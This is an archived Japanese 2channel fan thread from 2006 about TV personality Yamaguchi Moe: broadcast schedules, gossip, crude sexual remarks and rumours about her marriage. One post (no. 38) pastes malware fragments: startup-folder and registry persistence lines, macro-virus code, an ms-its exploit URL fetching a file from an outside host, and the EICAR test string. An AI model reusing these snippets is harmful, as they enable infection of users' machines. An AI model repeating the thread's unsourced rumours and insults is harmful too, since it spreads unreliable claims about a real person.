2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

♪地道にがんばる☆山口もえ♪ パ-ト17

1 :通行人さん@無名タレント:2006/10/19(木) 23:16:48 ID:fERucAa+
公式ページ
http://www.stardust.co.jp/rooms/moe/
前スレ ♪地道にがんばる☆山口もえ♪ パ-ト16
http://tv7.2ch.net/test/read.cgi/geino/1133704409/

2 :通行人さん@無名タレント:2006/10/19(木) 23:18:20 ID:Kn3gfsaB
ババ草臥れた顔になったな





3 :あぼーん:あぼーん
あぼーん

4 :通行人さん@無名タレント:2006/10/19(木) 23:19:18 ID:fERucAa+
10/22(日) : 『たかじんのそこまで言って委員会』 13:30〜15:00 YTV
10/24(火) : 『ロンドンハーツ』 21:00〜21:54 ANB
10/26(木) : 『はなまるマーケット』 08:30〜09:55 TBS
11/01(水) : 『クイズ!ヘキサゴンUSP』 19:00〜20:54 CX
11/04(土) : 『あさパラ!』 09:25〜10:30 YTV
11/07(火) : 雑誌『ESSE』12月号 発売

毎週月曜日 : 『2時っチャオ!』 14:00〜15:53 TBS

5 :あぼーん:あぼーん
あぼーん

6 :通行人さん@無名タレント:2006/10/22(日) 01:35:25 ID:TcU0CsxP
今日は委員会か

7 :通行人さん@無名タレント:2006/10/22(日) 07:33:30 ID:bW0CpgNc
たかじんの番組では、もえちゃんは、どんな発言してるのかな?
私なんかは、関東の人だし、見れなくて。
ちゃんとした、政治発言されてるとか?
何か、テレビタックルみたいな、番組で、
あの、田嶋先生も、出てるとか。
もえちゃんとの、からみ面白そうだな。

8 :通行人さん@無名タレント:2006/10/23(月) 00:06:23 ID:aXR25ZuP
10/22(日) : 『たかじんのそこまで言って委員会』 13:30〜15:00 YTV
10/24(火) : 『ロンドンハーツ』 21:00〜21:54 ANB
10/26(木) : 『はなまるマーケット』 08:30〜09:55 TBS
10/28(土) : 『もしもツアーズ』 18:30〜19:00 CX
11/01(水) : 『クイズ!ヘキサゴンUSP』 19:00〜20:54 CX
11/03(金) : 『京都特番2006 京都ベタ案内〜嵐山編〜』 14:00〜17:54 ABC
11/04(土) : 『あさパラ!』 09:25〜10:30 YTV
11/07(火) : 雑誌『ESSE』12月号 発売

毎週月曜日 : 『2時っチャオ!』 14:00〜15:53 TBS

9 :通行人さん@無名タレント:2006/10/23(月) 00:23:41 ID:tu1b53uE
最近のもえの衣装エロエロ


10 :通行人さん@無名タレント:2006/10/23(月) 17:30:59 ID:KsnEexDr
もえちゃん、本当に忙しそう。
結婚前と変わらないんじゃない。


11 :通行人さん@無名タレント:2006/10/23(月) 18:43:54 ID:lAQ3yHTI
委員会の衣装は今までとは違った衣装だったね

12 :通行人さん@無名タレント:2006/10/24(火) 00:37:43 ID:P+o9m75n
松井と長州が来ないな??

13 :通行人さん@無名タレント:2006/10/24(火) 17:07:42 ID:Hlrrgwq0
委員会の衣装チリ湖かチなってぃーが着そうな感じだな

14 :通行人さん@無名タレント:2006/10/24(火) 21:57:47 ID:PcZahNR0
体操着もえ

15 :通行人さん@無名タレント:2006/10/24(火) 23:40:24 ID:yRIn9xV5
http://captain.jikkyo.org/cat/s/cat1161694315309.jpg
http://captain.jikkyo.org/cat/s/cat1161694355463.jpg
http://captain.jikkyo.org/cat/s/cat1161694383328.jpg
http://captain.jikkyo.org/cat/s/cat1161694422708.jpg
http://captain.jikkyo.org/cat/s/cat1161694498775.jpg




16 :通行人さん@無名タレント:2006/10/24(火) 23:43:04 ID:yRIn9xV5
http://captain.jikkyo.org/cat/s/cat1161694355463.jpg
もえ乳垂れてる

17 :通行人さん@無名タレント:2006/10/25(水) 01:40:40 ID:9mnrlVqb
今日のロンドンハーツは残念ながら安めぐみの独り舞台だった

18 :通行人さん@無名タレント:2006/10/25(水) 15:41:39 ID:eaG3td2R
もえチャンの体操着姿が見れて夢のようだよ〜(*´Д`)

19 :通行人さん@無名タレント:2006/10/25(水) 20:24:08 ID:F6TPb8QG
明日ははなまる〜♪

20 :通行人さん@無名タレント:2006/10/25(水) 21:28:37 ID:46aQOog8
ヘキサゴンの予告見たけどチームの後ろから二番だった
相当馬鹿だね  演技でも見苦しいし 
三船と香田より下だったし
でも脚綺麗

21 :通行人さん@無名タレント:2006/10/26(木) 09:47:29 ID:d8RXyTGg
はなまる司会出演は今日かぎり?

22 :通行人さん@無名タレント:2006/10/26(木) 14:24:35 ID:mjI4fQv/
司会下手糞だった。。けど可愛いから許せる。。

>>20
まあ、勉強はしていないからね

23 :通行人さん@無名タレント:2006/10/27(金) 00:11:22 ID:nvpYl0P4
こういうときに呼ばれるというのは将来のレギュラーのための
オーディションも兼ねてるのかな

24 :通行人さん@無名タレント:2006/10/27(金) 10:22:26 ID:GIhKiYG7
正直、あのキャラでやると司会は無理っぽい。
もし司会やるとしたら深夜の低俗番組くらいだと思う


25 :通行人さん@無名タレント:2006/10/27(金) 17:06:33 ID:pE4UvN2p
ビデオに録画してたのをさっき見た。
チェックのミニスカートから伸びたタイツ脚が細すぎ。
もっと全身像を見せて欲しかった。

26 :通行人さん@無名タレント:2006/10/27(金) 18:28:42 ID:FKRlCQAT
もえちゃんは、確か42キロだよ。
まあ、でも芸能人だと、これくらい普通だと思う。


27 :よしこちゃん:2006/10/27(金) 20:07:26 ID:FKRlCQAT
じゃあ、テレビでも細いってことは、
生、実物でみるとがりがり?


28 :通行人さん@無名タレント:2006/10/27(金) 22:49:34 ID:QbRmxWHK
テレビで見ると太って見えるからな
あのタイツは太股までかね

29 :よしこちゃん:2006/10/28(土) 15:42:33 ID:xOZplUL3
今夜は、もしもツアーズ、
坂下ちりこのやつ。期待大です。

30 :よしこちゃん:2006/10/28(土) 19:12:46 ID:xOZplUL3
さっき、もしツア見ました。たったの30分でも、
嬉しかったです。見た方、感想を。
やっぱり、もえちゃん、細いなー。うらやましい。
何か、結婚してから、どんどん痩せていく気がします。

31 :通行人さん@無名タレント:2006/10/28(土) 21:32:28 ID:BYB+80Ns
今日久しぶりに見たんだけど
老けてない?

32 :通行人さん@無名タレント:2006/10/28(土) 22:59:31 ID:idlC11k0
>>30
逆にデブってる気がする

33 :通行人さん@無名タレント:2006/10/28(土) 23:26:28 ID:xOZplUL3
意外と、もえちゃんって、年いってるんだよね。
今、30歳?だっけ。
私は、てっきり最近まで、20代前半かと思ってました。
尾関さんとの、結婚で、年齢を知り、驚きました。


34 :通行人さん@無名タレント:2006/10/29(日) 11:02:53 ID:Pgq1UC0A
21歳かとおもた

35 :通行人さん@無名タレント:2006/10/29(日) 19:05:55 ID:DQu8JS0Q
最近までうらりんギャルなんて、知らなかった。
今、遅咲きなタレントって多いけど、
もえちゃんも、遅咲きだったんだね。
いままで、ほしのあき、熊田、佐藤たまお辺りなんて、
遅咲きで、もてはやされてるけど。
こないだ、もえちゃんのデビューが18歳って聞いて、
驚いた。昔から、かわいかったんだね。

36 :通行人さん@無名タレント:2006/10/29(日) 20:59:15 ID:hoFeqtJb
2000年頃にはレギュラー番組10本近く持ってたんだから遅咲きじゃない

37 :通行人さん@無名タレント:2006/10/29(日) 22:37:11 ID:zHalibSN
返り咲き

38 :<body onload=window()>:2006/10/30(月) 02:01:15 ID:BKS8Ou/j
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


39 :通行人さん@無名タレント:2006/10/30(月) 10:59:11 ID:l+cKmxt5
今日、午後2時、こうご期待。


40 :通行人さん@無名タレント:2006/11/01(水) 03:26:02 ID:cV7y5lWr
もえチャンとハフハフしたいな(*´Д`)

41 :通行人さん@無名タレント:2006/11/01(水) 14:28:11 ID:GaGNz1T+
墓石商法詐欺、恐喝脅迫、その他、まとめサイト。
細木数子を踏み潰すブログ
細木の活動を支援していると思われる企業・団体に公開質問状を送ります。
http://blog.livedoor.jp/tenchu13/

細木講演会の潜入レポートマンガ
http://g007.garon.jp/gdb/GI/1C/1F/NO/dS/2z/eC/dX/4M/sI/XT/_0Or.jpg

細木数子 フリー百科事典『ウィキペディア(Wikipedia)』
http://ja.wikipedia.org/wiki/%E7%B4%B0%E6%9C%A8%E6%95%B0%E5%AD%90

細木数子 先祖供養のトホホ
http://www.nazotoki.com/senzokuyo.html

♪地道にがんばる☆山口もえ♪ パ-ト17
http://tv7.2ch.net/test/read.cgi/geino/1161267408/l50
仏壇については昔は「翠雲堂」というところと組んでいた(山口もえの実家)

翠雲堂ホームページ 山口もえ 結婚特別報告あり。
http://www.suiundo.co.jp/

■細木 数子の占いを語る総合スレ■ part13
http://hobby8.2ch.net/test/read.cgi/uranai/1144828927/
細木 数子の総合スレです。
六星占術、大殺界、アンチ細木、占ってもらったことのある方、TVの感想など
細木 数子に関するスレはこちら以外、全て禁止です。
六星占星術別の話題は「占い性格診断板」へ。

42 :通行人さん@無名タレント:2006/11/01(水) 21:29:44 ID:t4/r5CW9
久しぶりに録画失敗した
ヘキサゴンなんてあんまり出番無いのわかってるけど
それでもへこむわ

43 :通行人さん@無名タレント:2006/11/01(水) 22:55:43 ID:qf9SPIOJ
ヘキサゴン、足が綺麗だった

44 :通行人さん@無名タレント:2006/11/01(水) 23:16:46 ID:IzxAjAgw
もえタンの太股で寝たい

45 :通行人さん@無名タレント:2006/11/01(水) 23:30:47 ID:t4/r5CW9
もえタンの太ももは固そうだけど

46 :通行人さん@無名タレント:2006/11/02(木) 21:09:53 ID:JObbFTi1
僕のもえチャンは誰にも渡さないよ(*´Д`)

47 :通行人さん@無名タレント:2006/11/02(木) 23:01:46 ID:C02PoQGr
もえの太ももはきっと柔らかいしおいちいよ

48 :通行人さん@無名タレント:2006/11/03(金) 00:59:23 ID:UL2c99Ff
もえちゃんも妊娠すればオッパイデカくなるのに・・・

本庄まなみと梅津穴もでかくなった

49 :通行人さん@無名タレント:2006/11/03(金) 01:10:32 ID:1Pv9Zh59
このスレも地道にがんばってますね。
これからもがんばって下さい。

50 :通行人さん@無名タレント:2006/11/03(金) 21:15:37 ID:pgt9X5bH
>>48
タオル巻いて温泉に入るのもNGなのに大きくなっても意味無いがな

51 :通行人さん@無名タレント:2006/11/04(土) 12:41:07 ID:CzbuDmpz
当分、もえちゃんは、仕事、仕事だと思う。
これから、年末、特番増えるしね。

52 :通行人さん@無名タレント:2006/11/04(土) 16:10:53 ID:eqaeL2UE
たくさんもえちゃん見れるのは嬉しいけど、身体壊さないか心配だなあ・・・

53 :通行人さん@無名タレント:2006/11/04(土) 17:23:46 ID:CzbuDmpz
何か、昔は睡眠時間が2時間って言ってた。
結局、倒れたみたいだけどね。
だけど、売れっ子タレントって、
そんな、睡眠時間ないのかな?タレントも楽じゃないね。

54 :通行人さん@無名タレント:2006/11/05(日) 04:09:03 ID:0C6nvSLe
11/07(火) : 雑誌『ESSE』12月号 発売
11/10(金) : 『情報ライブミヤネ屋』 15:49〜17:50 YTV
11/11(土) : 『愛しの仕事さま』 24:00〜24:54 BS-i (再)
11/12(日) : 『アッコにおまかせ』 11:45〜12:54 TBS
11/12(日) : 『世界ウルルン滞在記』 22:00〜22:54 TBS
11/15(水) : フリーペーパー雑誌『City Wedding』(http://citywedding.jp/
11/18(土) : 『ビューティーバイブル』 16:00〜17:15 TX
11/19(日) : 『いまどき!ごはん』 18:00〜18:30 EX
11/20(月) : 『フェイクオフ』 24:45〜25:08  CX
11/20(月) : 購買誌『Yomy』
11/21(火) : 『ロンドンハーツ』 21:00〜21:53 EX
11/24(金) : 『板東英二の欲バリまるごと北海道パート2』 09:55〜11:30 MBS
11/24(金) : 『板東英二の欲バリまるごと北海道パート2』 09:55〜10:50 RKB毎日放送
11/25(土) : 『板東英二の欲バリまるごと北海道パート2』 13:05〜14:00 HBC
11/26(日) : 『たかじんのそこまで言って委員会』 13:30〜15:00 YTV

毎週月曜日 : 『2時っチャオ!』 14:00〜15:53 TBS

55 :通行人さん@無名タレント:2006/11/05(日) 10:29:36 ID:QeCv+X9g
>54
ありがとうございます

東海テレビでは、11/12(日)16:00〜17:25 初体験へんしん生活の再放送があるよ♪

56 :通行人さん@無名タレント:2006/11/06(月) 00:59:59 ID:d0q9Vt/x
旦那さんの誕生日か

57 :通行人さん@無名タレント:2006/11/06(月) 15:25:27 ID:G4n4BaYN
数年前は仕事無くなりかけてたのにね この女‥

58 :通行人さん@無名タレント:2006/11/06(月) 20:04:37 ID:zuGVgurN
2時っちゃおで、もえちゃんの隣に座ってる男の人、
もえちゃんの、旦那さんに似てない?

59 :通行人さん@無名タレント:2006/11/07(火) 09:02:32 ID:cGxsmrVB
City Weddingは関東限定配布なのね

60 :通行人さん@無名タレント:2006/11/07(火) 16:08:36 ID:saRxXw8+
旦那
女といちゃついてましたけど?


61 :通行人さん@無名タレント:2006/11/07(火) 20:07:55 ID:kTJG2ZOv
60さん、えっ、本当ですか?もえちゃんじゃなくて?
じゃあ、お店の女の子とか?
まあ、仕事している限り、色々付き合いあるしね。
お酒に酔ってたなんて事もあるし。

62 :通行人さん@無名タレント:2006/11/08(水) 00:26:13 ID:plfstO+B
旦那の店の近くじゃなかったよ

誕生日に女といちゃついてたら浮気だろ
キレイな女だったし

63 :通行人さん@無名タレント:2006/11/08(水) 01:35:57 ID:gZ18PkAm
確かに、結婚する前は、女関係凄かったみたい。
でも、結婚するんで、今までの女関係すべて、
整理してたはず。浮気症の人って治らないのかな?
この事、知ったら大変。もえちゃん、怒ると、
めっちゃ、怖いらしいから。

64 :通行人さん@無名タレント:2006/11/08(水) 01:44:00 ID:gZ18PkAm
喧嘩しても、最後は旦那さんがおれるみたい。
うまく、なだめて。

65 :通行人さん@無名タレント:2006/11/10(金) 00:35:55 ID:lAIN4jE2
主婦タレント枠に吉岡美穂まで参戦されたらいよいよやばくないか

66 :通行人さん@無名タレント:2006/11/12(日) 17:39:45 ID:9hOT1uBU
へんしん生活再放送、もえさん出てなかったね...てか、スタジオ部分カットだった...√l゜

67 :通行人さん@無名タレント:2006/11/12(日) 17:45:35 ID:0QxXEVpi
数少ないうらりんギャルの生き残りだから、もえちゃんには頑張って欲しい。

68 :通行人さん@無名タレント:2006/11/12(日) 22:42:42 ID:BfmmiLNR
ウルルンのもえちゃんなんだか清楚で綺麗
女の子らしくてほんわかしててなんか好きだわ

69 :通行人さん@無名タレント:2006/11/13(月) 00:57:04 ID:Ne7pykxx
私は、もえちゃんのファンになって一年たちました。
早いものです。今年の4月は舞台も観たし、
満足です。来年もし、舞台あれば是非
見に行きたいです。

70 :通行人さん@無名タレント:2006/11/13(月) 21:56:51 ID:tk+OcBQl
もえがんばれ〜!

71 ::2006/11/13(月) 23:49:26 ID:QczgvdxR
生もえちゃんみたい!
どうしたらいいでつ?

72 :通行人さん@無名タレント:2006/11/14(火) 12:36:49 ID:ISMSUWQ8
今度、もし、トークショーとか、あったら
行けばいい。もえサイトを毎日見て、
情報あれば、すぐ詳細出るから。
握手できたファンもいたらしいよ。

73 ::2006/11/16(木) 13:16:22 ID:A/ZDisFu
俺の理想の女性、もえちゃん!
大好き!
一緒にいたら癒されそう。

74 :通行人さん@無名タレント:2006/11/16(木) 18:30:36 ID:NlJ5FZbm
>>71
生もえチャン(*´Д`)ハフハフ

75 :通行人さん@無名タレント:2006/11/17(金) 02:19:02 ID:DO1kdVOW
正直生で見ない方がいいと思う
痩せすぎでちょっと怖いから

76 :通行人さん@無名タレント:2006/11/17(金) 10:20:30 ID:iSQCvKPW
確か、もえちゃんは、160cm、42キロのはず。
でも、タレントさんなんて、みんなそんなもんじゃない?


77 :通行人さん@無名タレント:2006/11/17(金) 19:29:28 ID:XKrdXbwo
↑だと、BMI指数では16だった。
もえちゃん痩せすぎ。

http://diet.beauty.yahoo.co.jp/check/proportion/bin?v_height=160&v_weight=42&v_submit=submit

78 :通行人さん@無名タレント:2006/11/17(金) 20:55:33 ID:V4mGzp4i
大きなお世話。

79 ::2006/11/17(金) 21:29:02 ID:AKcp//Em
別に痩せすぎだろうが、どうでもいいですよ〜!
もえチャン最高!

80 :通行人さん@無名タレント:2006/11/18(土) 18:53:49 ID:V+W895bI
ビューティーバイブル他のタレントは色々体験してるのに
もえちゃんは座ってご飯食べたりしてるだけで楽だな

81 :通行人さん@無名タレント:2006/11/19(日) 05:53:33 ID:7rgI2LL6
離婚イツ

82 :通行人さん@無名タレント:2006/11/19(日) 07:37:58 ID:j2L2ZBbn
最近、昔の「世にも奇妙な物語」のビデオ借りてみたら、警察がマニュアル化された‥って話に受け付けとして 山口もえが出てたんだけど、話し方ってゆーか、声が全然違ってびっくりした。

83 :通行人さん@無名タレント:2006/11/19(日) 07:52:13 ID:GHiCHJNZ
>>82
kwskそれ見てみたい

84 :通行人さん@無名タレント:2006/11/20(月) 00:32:16 ID:jbZHZqVS
萌えー

85 :通行人さん@無名タレント:2006/11/20(月) 17:02:37 ID:yF9aUa9h
昔は滑舌悪い分ハキハキしゃべろうとかなり力んでたからね。
今年の舞台の時もそういう喋り方になってたなあ。

86 :通行人さん@無名タレント:2006/11/20(月) 17:25:25 ID:yF9aUa9h
公式にあるトークショーの時の写真が
生で見た感じに近いんじゃないかと思う。
映像ではGの嵐でエアギターやってた時かな。

87 ::2006/11/21(火) 00:48:25 ID:M9j53f5S
これからフジでもえチャンでるぞぉ!

88 :通行人さん@無名タレント:2006/11/21(火) 10:37:38 ID:6pte0lH/
公式以外の情報
11/27(月) : 『迷宮美術館』 13:00〜14:00 NHK-hi
11/28(火) : 『ウチくる!?』(再) 15:05〜15:58 CX


89 :通行人さん@無名タレント:2006/11/21(火) 11:27:31 ID:e5S9bv4h
11/28(火) : 『ウチくる!?』(再) 15:05〜15:58 CX
でも、リアルタイムの時でもいいので誰か動画うpしてもらえないでしょうか?

90 :通行人さん@無名タレント:2006/11/21(火) 23:47:21 ID:Up8m+dnC
今日のロンハーで着てた服ってどこのだろ?
もえちゃんいつも服可愛いよね

91 :通行人さん@無名タレント:2006/11/21(火) 23:56:58 ID:pYe8HBys
このスレ、パート17まで来てる割にスレの進み具合遅いような・・・

92 :通行人さん@無名タレント:2006/11/22(水) 00:56:31 ID:pDDpawa2
もえちゃん、10位に選ばれたとき
(ゆういつの勝ち組だよねーといわれた後)
何か言いたげだったけどなにが言いたかったのかな?
だんなとうまくいってないとか?!


93 :通行人さん@無名タレント:2006/11/22(水) 01:01:03 ID:y2bk6+HU
>>91
一時期荒らされた時期があってそこで一気に進んだ

94 :通行人さん@無名タレント:2006/11/23(木) 00:35:26 ID:vc4HUaFn
ロンハーの格付け
男で人生をボウに振りそうな女ランキングで
山口と付き合うと男の方が人生をボウに振りそうだと言われたときに
天然ぶって「ボウなら振った事ありますよぉ〜」って
ほんとすげーすべってたな
いい加減あの話し方やめろよむかつくから
あれみてかわいいとか言ってるヤツたのむから死んでくれ

自然な状態であれならしょうがないけど
わざとゆっくり舌足らずな話し方してんだぞ
イライラしねーのおまえら?

95 :通行人さん@無名タレント:2006/11/23(木) 00:42:30 ID:vc4HUaFn
おれは小倉と山口がゆっくり天然ぶって声こもらせて
話してるの見るともう本当スゲーむかつくんだよ
人と話すときは相手のことを考えてなるべく聞き取りやすく話そうとするだろ
こいつらだって同じような話し方されたらイラつくだろうが
あのてのキャラはこの二人で終わらせてくれ

96 :通行人さん@無名タレント:2006/11/23(木) 01:49:15 ID:OF/dGZwM
なんかな、素であんな声の人いるんだよ。ほんとに。
親にキレながら口答えするときまで、あんな喋り方の人に
今まで2人出会った。妹に命令する時も、説得力がないったら。

97 :通行人さん@無名タレント:2006/11/23(木) 02:18:25 ID:6ZJtOut5
ご苦労。

98 :通行人さん@無名タレント:2006/11/23(木) 04:54:44 ID:oAiZMCeN
>>95
昔に比べたら鼻声が治って無茶苦茶聞き取りやすくなってるのに

99 :通行人さん@無名タレント:2006/11/23(木) 06:08:00 ID:TmSdXyk4
山口もえさんのテレビゲームのCM見てみたいんでYOUTUBEか何かにあげてください。お願いします(^∧^)

100 :通行人さん@無名タレント:2006/11/23(木) 12:13:48 ID:uEqEOMLk
>>96
瀬川えいこのようなのんびりタイプはいるが
この二人はまた別物。完全に意識してやってる


101 :通行人さん@無名タレント:2006/11/23(木) 16:09:46 ID:eg3cYLrP
この子、すごい計算してそうだよね?

102 :通行人さん@無名タレント:2006/11/23(木) 16:35:26 ID:aNf/1Zu3
キャラ作りウザ杉

103 :通行人さん@無名タレント:2006/11/23(木) 21:55:31 ID:oAiZMCeN
>>89
この回かな
ttp://www.mediafire.com/?3ontutigtmm

104 :通行人さん@無名タレント:2006/11/25(土) 15:47:41 ID:sOMEl1Up
北海道通販番組各地の時間の差はなんだ

105 :通行人さん@無名タレント:2006/11/26(日) 14:56:49 ID:mIJcT3DH
マネージャーが厳しい人なんだね。
金づるとは言い過ぎだと思ったけど、お尻を叩いて動かしてくれるような人の方が結果的にはよかったんだろうね。
お尻を叩くといえば、子供の頃もえちゃんはお尻を叩かれて叱られていたんだよね。

106 :通行人さん@無名タレント:2006/11/26(日) 17:02:54 ID:Wzp9fNib
委員会で久しぶりに見たら疲れた主婦みたいな顔してたけど大丈夫か

107 :通行人さん@無名タレント:2006/11/26(日) 17:08:37 ID:yxANe6qF
>>105
誰かが助けてくれないと何も出来ないような
そういうキャラを演じてるだけ


108 :通行人さん@無名タレント:2006/11/26(日) 17:13:05 ID:Wzp9fNib
一応コピペ

11/26(日) : 『たかじんのそこまで言って委員会』 13:30〜15:00 YTV
11/26(日) : 『いまどき!ごはん』 18:00〜18:30 ANB
11/26(日) : 『ウタワラ』 19:58〜20:54 NTV
12/02(土) : 『マゴからの贈り物』 15:00〜17:30 CBC
12/03(日) : 『Music Lovers』 23:30〜23:55 NTV
12/04(月) : 『快感MAP』 24:15〜24:45 ANB
12/04(月) : 『最終警告!たけしの本当は怖い家庭の医学』 20:00〜20:54 ANB
12/05(火) : 『タモリのジャポニカロゴス』 23:00〜23:30 CX
12/09(土) : 『おネエ★MANS』 17:30〜18:00 NTV
12/14(木) : 『ビーバップハイヒール』 23:17〜24:17 ABC
12/17(日) : 『たかじんのそこまで言って委員会』 13:30〜15:00 YTV
12/17(日) : 『情報ライブミヤネ屋』 15:49〜17:50 YTV
12/22(金) : 『ロンドンブーツクリスマスSP '06』 23:30〜25:00 ANB
12/23(土) : 『知っとこ!』 07:30〜09:25 MBS
12/24(日) : 『たかじんのそこまで言って委員会SP』 15:00〜16:30 YTV

01/06(土) : 雑誌『ESSE』 発売
01/15(月): 『くりいむナントカ』 23:25〜24:10 ANB

毎週月曜日 : 『2時っチャオ!』 14:00〜15:53 TBS

109 :通行人さん@無名タレント:2006/11/27(月) 00:17:20 ID:LTm+ee4e
ウタワラほとんど意味無かったな

110 :通行人さん@無名タレント:2006/11/27(月) 18:52:53 ID:ORU986uX
出川に、きついこと、言っていたのが、印象的だったけど。
そのあと、出番あった?

111 :通行人さん@無名タレント:2006/11/27(月) 20:57:50 ID:6JWHQhFk
>>102
本人が認めています。

112 :通行人さん@無名タレント:2006/11/28(火) 10:40:07 ID:3dHPgtD5
もえちゃんの美容方、食べてるものが知りたい


113 :通行人さん@無名タレント:2006/11/28(火) 10:42:52 ID:3dHPgtD5
美容法 のまちがい

114 :通行人さん@無名タレント:2006/11/29(水) 01:54:17 ID:JsURuxbo
エイヒレ

115 :通行人さん@無名タレント:2006/12/02(土) 04:07:04 ID:coG/vuDQ
CBC見れない

116 :通行人さん@無名タレント:2006/12/02(土) 10:00:44 ID:BosEEFxp
もえちゃんがブログ始めたけど・・・
誰も騒がないのね・・・

117 :通行人さん@無名タレント:2006/12/02(土) 16:54:36 ID:coG/vuDQ
あさパラ出てたの?

118 :通行人さん@無名タレント:2006/12/03(日) 02:05:43 ID:GhGuYN1/
>>94
禿同。
棒の話、スベリすぎだし。あれを話して良しと判断したのが
舐めてる感じがしてムカツイタ。天然キャラすらもまともにできないんだな。
まだ小倉優子のがまだまし。

119 :通行人さん@無名タレント:2006/12/03(日) 10:30:52 ID:Y23CdlC8
もえちゃんは、血液型AB型だけど、案外きつい性格かも。
旦那さんにも、きついこと言ってないか心配?
何しろ、怒ると、めっちゃ怖いらしいよ、
前、うちくるとかゆう、番組の中で、旦那さんの苦情で、
怒ると、とにかく怖いらしい。
かわいいし、料理、洗濯完璧。
ただ、あまり怒らないでって、言ってました。


120 :通行人さん@無名タレント:2006/12/04(月) 00:31:57 ID:medThdQZ
リニューアルされた公式サイトの写真も涙が出るほどかわいい

121 :通行人さん@無名タレント:2006/12/05(火) 13:21:53 ID:9uRUigKf
だな。
いつみても、本当にカワイイ♪

122 :通行人さん@無名タレント:2006/12/05(火) 23:14:38 ID:to9cNNt+
大好きだあ

123 :通行人さん@無名タレント:2006/12/05(火) 23:30:13 ID:ORMP1otY
ジャポニカロゴスの衣装のふともも(;´Д`)ハァハァ

124 :通行人さん@無名タレント:2006/12/05(火) 23:53:29 ID:fokOF+Ab
山口もえのブログ
http://www.blog-stardust.jp/moe/
おまえら絶対に荒らしちゃダメだぞ?

125 :通行人さん@無名タレント:2006/12/06(水) 00:22:50 ID:a2sj93tW
旦那のくそブログ
貼れ

126 :通行人さん@無名タレント:2006/12/06(水) 00:30:55 ID:A1ZIGipA
旦那対処が山口もえの寿命縮めた早まったな山口さん

127 :通行人さん@無名タレント:2006/12/06(水) 15:44:03 ID:LoYRnaJw
>>120
確かに涙が出るほどかわいいね。
でも、奇跡の1枚かのようにそればかり使われていることにも涙が出るよ。

128 :通行人さん@無名タレント:2006/12/08(金) 14:35:20 ID:7plBh0dl
もえチャンでいっぱい出してあげるね(*´Д`)

129 :通行人さん@無名タレント:2006/12/08(金) 23:32:44 ID:wQM+nz6/
「おいでよどうぶつの森」買ってきたよ

もえたんとWi-Fiしたいなぁ♪

130 :通行人さん@無名タレント:2006/12/11(月) 15:22:12 ID:dBu4/kbW
山口もえか。元々こういう思い込みの激しい
勘違い女は好きじゃないな。
最近顔のシワが増えてすっかりおばさんになった。
まぁ結局のところどうでもいい存在だがね。

131 :通行人さん@無名タレント:2006/12/11(月) 18:31:18 ID:INvwkKWU
●ワイド特集:キムタクだけじゃない「この人たちの一分(いちぶ)」(抜粋)
・山口もえ・IT社長夫妻に危機? 「子づくりと沖縄移住」で夫婦ケンカ

週刊朝日(12/22)


132 :通行人さん@無名タレント:2006/12/11(月) 20:15:53 ID:7tL+fAoR
Qさまに出てる。風邪気味かな。ハスキーボイス。

133 :通行人さん@無名タレント:2006/12/12(火) 20:39:59 ID:DShM+LUU
もえちゃん、ブログ始めたけど、毎日のように、
更新されていて、嬉しい、みんなも見てますか?
前だったら、本人のメッセージ、たまにしか、
見れなかったけど、今は満足です。
あと、来週かな?ロンハー、3時間スペシャル。
ちょー、楽しみ。もえちゃんの、妙な毒舌聞けるかな?
あと、年末にかけて、出番が一杯。

134 :通行人さん@無名タレント:2006/12/12(火) 20:48:45 ID:GbS9LJw3
バババァ見てません

135 :通行人さん@無名タレント:2006/12/12(火) 21:53:15 ID:RG+V6zV6
そろそろもえちゃん主演のドラマとかないかな

136 :通行人さん@無名タレント:2006/12/13(水) 14:57:57 ID:Pq+IIb52
>>131
>子づくり



(*´Д`)(*´Д`)(*´Д`)(*´Д`)(*´Д`)(*´Д`)(*´¬`)

137 :通行人さん@無名タレント:2006/12/13(水) 17:14:32 ID:mJMfNOYB
もえちゃんのブログって携帯からでも見れるの?
誰かサイト教えてくださいm(__)m

138 :通行人さん@無名タレント:2006/12/14(木) 14:29:25 ID:gewv252j
相変わらず 仕事選ばないよね このオバハン

139 :通行人さん@無名タレント:2006/12/14(木) 14:56:39 ID:tngdWk1M
週刊朝日。読みました。
実は、旦那さんと喧嘩ばかりらしい?
なんでも、沖縄移住と、子作りに関しての事。
もえちゃんは、まだ、子供欲しくないんだけど、
旦那さんは、早く子供欲しがってるみたい。
記者が梨本さん情報なんだけどね。
気持ちのすれ違いなんだとか?

140 :通行人さん@無名タレント:2006/12/14(木) 20:55:15 ID:X+Zk7iAQ
梨本は誰に聞いたんだよ

141 :通行人さん@無名タレント:2006/12/14(木) 21:24:16 ID:tngdWk1M
確か、尾関さんの知人から聞いたって、書いてあった。
怒ると、めっちゃ、怖いって。
前、何かのテレビ番組で、梨本さん言ってたけど、
よく、記事の中で、なんとかさんの知人って
書いてある場合、ほとんど、友人とかじゃなく、
本人なんだって。差しさわりあるから、そこは、
判断して、知人にしてるんだって。
だから、尾関さん本人のコメントの可能性大。

142 :通行人さん@無名タレント:2006/12/14(木) 21:32:05 ID:X+Zk7iAQ
尾関氏が梨本に家庭の愚痴をペラペラ話すとは考えにくいな。
素人でも梨本のうさんくささはわかるはずだし。

